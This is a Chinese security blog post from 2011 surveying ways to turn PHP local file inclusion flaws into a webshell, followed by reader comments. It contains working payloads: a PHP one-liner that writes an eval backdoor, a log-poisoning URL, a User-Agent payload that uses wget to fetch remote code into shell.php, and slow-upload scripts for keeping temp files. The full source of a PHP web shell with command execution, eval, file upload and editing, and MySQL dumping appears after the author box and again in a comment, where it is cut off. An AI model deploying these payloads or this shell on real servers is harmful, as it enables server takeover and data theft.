PHP安全之LFI漏洞GetShell方法大阅兵

2011-06-16 23:23:40 19 LengF 5014

Author:LengF Blog:www.81sec.com
0x00 题外话
关于PHP中LFI(Local File Include,本地文件包含)漏洞很多朋友都不是很熟悉，其实网络上有很多这方面的资料，特别说国外的paper。虽然很多资料讲得不是很详细，但是大家都懒得去测试，本文就给大家总结下，并讲述完整的利用方法。[separator]
0x01 LFI的GETSHELL思路
在讲述如何利用LFI来或者webshell之前，不得不提醒大家php5.3.4中截断的bug已经修复了，所以在一些情况下不能成功利用也不要奇怪。
1.包含上传文件
只要目标服务器支持上传，不管是jpg，txt，gif等都可以，在其中包含一句话木马即可，这种方法很简单没什么可说的。
2.包含data:// 或者php://input 伪协议
利用该方法的前提是php.ini中allow_url_include=On，另外必须支持php://filter伪协议
我们来尝试这样一种情况，假设有文件包含漏洞代码如下：

<?php

$query=$_GET[‘p’];

Include($query);

?>

在allow_url_include=On就是远程文件包含了，假设这里为off，那就只能本地包含了。那么我们如何利用，我们就来谈谈利用PHP Input/Ouput Wrapper获取webshell了。我给大家写了一个利用程序，如图01：

这个漏洞的利用就到此了。这个漏洞对于php5.0以下有效，5.3测试失败，其他大家自行总结。还是比较鸡肋，不过不亏为一种好思路。
3.日志包含log日志文件
日志包含，这个还是比较实用的，一般apache或者其他的日志都会比较大，而我们为什么能通过日志getwebshell？比如apache，当我们访问一个网站的网页时，页面出错，服务器会记录访问的连接地址，如果我们带入恶意的代码那么这个就会被包含在日志文件中。所以我们一般的利用步骤是：
首先访问一个不可能存在页面并且携带恶意代码，比如邪恶代码为：

<?php fputs(fopen("/www/shell.php","W+"),"<?php eval($_POST[a]?>";?>

将它转换为url编码，然后访问
http://www.81sec.com/+urlencode(邪恶代码)
这个页面肯定不存在，那么在错误日志中就会形成一条这样日志，接下来，我们就包含这条日志：
http://www.81sec.com/test.php?p=../../../../var/logs/apache/www_error.log
apache路径需要自己去猜解，我这里只是给个实例，访问后就会生成一个shell了。
4.包含/proc/self/environ环境变量
这个是利用Linux中的环境变量作为基础，很多时候这个方法行不通，因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样，如果你访问/proc/self/environ有如图02：

看到这个代码就知道为什么利用这个Linux的环境变量，这里会有用户访问web的session信息，其中也会包含user-agent的参数，这个参数你浏览器名称的参数。而这个参数在我们客户端是可以修改的。
对于上面的LFI代码，我们可以这样利用：
http://www.81sec.com/test.php?p=../../../../proc/self/environ
如果能得到上图类似的内容说明有权限，就可以利用下面的方法得到webshell，我将两种方法。
方法一：借助firefox的插件user agent switch
利用方法很简单也很方便。我们先构造好自己的邪恶代码：

<?system('wget http://81sec.com/shell.txt -O shell.php');?>

然后通过这个插件修改user-agent，如图03：

先选择上图的Edit User Agents 然后按照你如图04设置：

完成后，访问/proc/self/environ即可。就可以得到shell了。这种方法从个人实践上来说相当的鸡肋。
方法二：自己用php写一个socket程序，发送http数据的时候记得修改user-agent选项为你的代码即可，具体的代码和上面第2种方法类似，留给大家去发挥了。
5.包含session文件
这个方法来自于k4shifz博客
php保存格式 sess_SESSIONID 默认位置是/tmp/和c:/windows/temp/ 。
关于最后一种比较麻烦，也够鸡肋。大家不要想当然，认为tmp和move_uploaded_file()有关，其实没有move_uploaded_file()函数时，php会自动、马上清除tmp文件，而让它保留在服务器的方法是慢连接。测试包含temp文件所用两脚本，这个方法唯一好处就是向任意php文件发包，php总会先在服务器上生成tmp文件，然后慢连接使它不被删除
(前提是php.ini file_uploads = On，5.3.1中增加了max_file_uploads，默认最大一次上传20个)：

<?

/* 这个所用时间较少 ， 会产生20个临时文件 */

set_time_limit(0);

$cmd = 'Content-Disposition: form-data; name="evil"; filename="evil.php"

Content-Type: zzz

<?phpinfo()?>

--k4shifz_boundary

';

$fs=fsockopen('localhost',80);

/* you can also use HTTP/1.1 */

fputs($fs,'POST /test.php HTTP/1.0

Content-Type: multipart/form-data; boundary=k4shifz_boundary

Host: localhost

Content-Length: 999999

--k4shifz_boundary

'.$cmd);

while($fs)

{

 fputs($fs,$cmd);

 sleep(1);

}

fclose($fs);

exit;

?>

<?

/* 所用时间较长，会产生1个临时文件 */

set_time_limit(0);

$fs=fsockopen('localhost',80);

fputs($fs,'POST /test.php HTTP/1.0

Content-Type: multipart/form-data; boundary=k4shifz_boundary

Host: localhost

Content-Length: 999999

--k4shifz_boundary

Content-Disposition: form-data; name="evil"; filename="evil.php"

Content-Type: zzz

<?phpinfo()?>

--k4shifz_boundary--

');

while($fs)

{

 fputs($fs,'AAAA');

 sleep(1);

}

fclose($fs);

exit;

?>

我没有实战测试过，不敢胡说，大家自己测试吧。
6.包含其他由php程序创建的文件
这个方法一般是依赖于你对程序的了解，适用于白盒测试漏洞挖掘的时候利用。当你发现一个LFI，那么你就必须详细阅读这个程序的其他文件，有可能存在变量覆盖漏洞，可以利用变量覆盖漏洞来执行某些php代码。给大家一个例子，关于bo-blog的变量覆盖漏洞利用的两个。

最后扯淡下，大牛就绕过了，本文只是扫盲，实际应用过程中会有不同的情况，需要自己随机应变。
[参考文档]
[+]http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf
[+]http://hi.baidu.com/kashifs/blog/item/7a4bbcff72cea90308244d2b.html

类别渗透测试

关于作者

LengF18篇文章157篇回复

Http://blog.sec-lab.org
http://www.bhst.org

<? @set_time_limit(0); function magic_q($s) { if(@get_magic_quotes_gpc())$s=stripslashes($s); return $s; } function get_perms($fn) { $mode=fileperms($fn); $perms=($mode&00400)?'r':'-'; $perms.=($mode&00200)?'w':'-'; $perms.=($mode&00100)?'x':'-'; $perms.=($mode&00040)?'r':'-'; $perms.=($mode&00020)?'w':'-'; $perms.=($mode&00010)?'x':'-'; $perms.=($mode&00004)?'r':'-'; $perms.=($mode&00002)?'w':'-'; $perms.=($mode&00001)?'x':'-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by Safe.yi.org</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> <form method='post' name='pages'> <input name='page' type=hidden> </form> headka; header("Expires: Mon, 26 Jul 1990 00:00:00 GMT"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")."GMT"); $ac_page=isset($_POST['page'])?$_POST['page']:'cmd'; $ac_page=($ac_page!='cmd'&&$ac_page!='mysql'&&$ac_page!='eval')?'cmd':$ac_page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\'#\'onclick=\'pages.page.value="cmd";pages.submit();\'>cmd</a>###<a href=\'#\' onclick=\'pages.page.value="mysql";pages.submit();\'>mysql</a>###<a href=\'#\'onclick=\'pages.page.value="eval";pages.submit();\'>eval</a>###</center>'; switch($ac_page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=@getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(@file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value='<?=str_replace('\'',''',$cmd)?>'> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(@shell_exec($cmd))."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing: '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { $files=array(); while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(@is_dir($fn)||$fn=='..') { echo('<a href=\'#\' onclick=\'list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; if(@is_link($fn)) { $flink=readlink($fn); echo('<font color=white>'.htmlspecialchars(strlen($fn.=' -> '.$flink)>format?substr($fn,0,format-3).'...':$fn).'</font>'.str_repeat(' ',format>strlen($fn)?(format-strlen($fn)):0)); } else { echo('<a href=\'#\' onclick=\'list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format>strlen($fn)?(format-strlen($fn)):0)); } if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> <tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else if(@mysql_num_fields($result)) { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>

评论19次

要评论？请先登录或注册

19楼

fucker
2011-10-26 11:02

mark

回复|@ta|踩(0)|顶(0)
18楼

BinAry
2011-10-6 12:43

这是LFI的GetShell方法··· 最近正蛋疼遇到，log文件过大，包含利用不成功。

回复|@ta|踩(0)|顶(0)
17楼

k4shifz
2011-10-5 13:10

多谢，那个环境变量的利用懂了：P

回复|@ta|踩(0)|顶(0)
16楼

maya66
2011-6-26 00:49

学xi了，果然是好文章啊。。。

回复|@ta|踩(0)|顶(0)
15楼

qhkest
2011-6-17 23:02

真的很不错。学xi了

回复|@ta|踩(0)|顶(0)
14楼

LengF
2011-6-17 21:21

你详细看下http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf 这个文档，有说明。具体我没有实战过不好说。很多时候是最后一种方法比较有效。

回复|@ta|踩(0)|顶(0)
13楼

liquan
2011-6-17 14:33

LZ写的很详细.赞一个

回复|@ta|踩(0)|顶(0)
12楼

小钟
2011-6-17 12:38

马克

回复|@ta|踩(0)|顶(0)

11楼

大虫

2011-6-17 12:05

<? @set_time_limit(0); function magic_q($s) { if(@get_magic_quotes_gpc())$s=stripslashes($s); return $s; } function get_perms($fn) { $mode=fileperms($fn); $perms=($mode&00400)?'r':'-'; $perms.=($mode&00200)?'w':'-'; $perms.=($mode&00100)?'x':'-'; $perms.=($mode&00040)?'r':'-'; $perms.=($mode&00020)?'w':'-'; $perms.=($mode&00010)?'x':'-'; $perms.=($mode&00004)?'r':'-'; $perms.=($mode&00002)?'w':'-'; $perms.=($mode&00001)?'x':'-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by Safe.yi.org</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> <form method='post' name='pages'> <input name='page' type=hidden> </form> headka; header("Expires: Mon, 26 Jul 1990 00:00:00 GMT"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache");  header("Last-Modified: ".gmdate("D, d M Y H:i:s")."GMT");  $ac_page=isset($_POST['page'])?$_POST['page']:'cmd'; $ac_page=($ac_page!='cmd'&&$ac_page!='mysql'&&$ac_page!='eval')?'cmd':$ac_page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\'#\'onclick=\'pages.page.value="cmd";pages.submit();\'>cmd</a>###<a href=\'#\' onclick=\'pages.page.value="mysql";pages.submit();\'>mysql</a>###<a href=\'#\'onclick=\'pages.page.value="eval";pages.submit();\'>eval</a>###</center>'; switch($ac_page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=@getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(@file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(@shell_exec($cmd))."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing: '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { $files=array(); while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(@is_dir($fn)||$fn=='..') { echo('<a href=\'#\' onclick=\'list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; if(@is_link($fn)) { $flink=readlink($fn); echo('<font color=white>'.htmlspecialchars(strlen($fn.=' -> '.$flink)>format?substr($fn,0,format-3).'...':$fn).'</font>'.str_repeat(' ',format>strlen($fn)?(format-strlen($fn)):0)); } else { echo('<a href=\'#\' onclick=\'list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format>strlen($fn)?(format-strlen($fn)):0)); } if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; 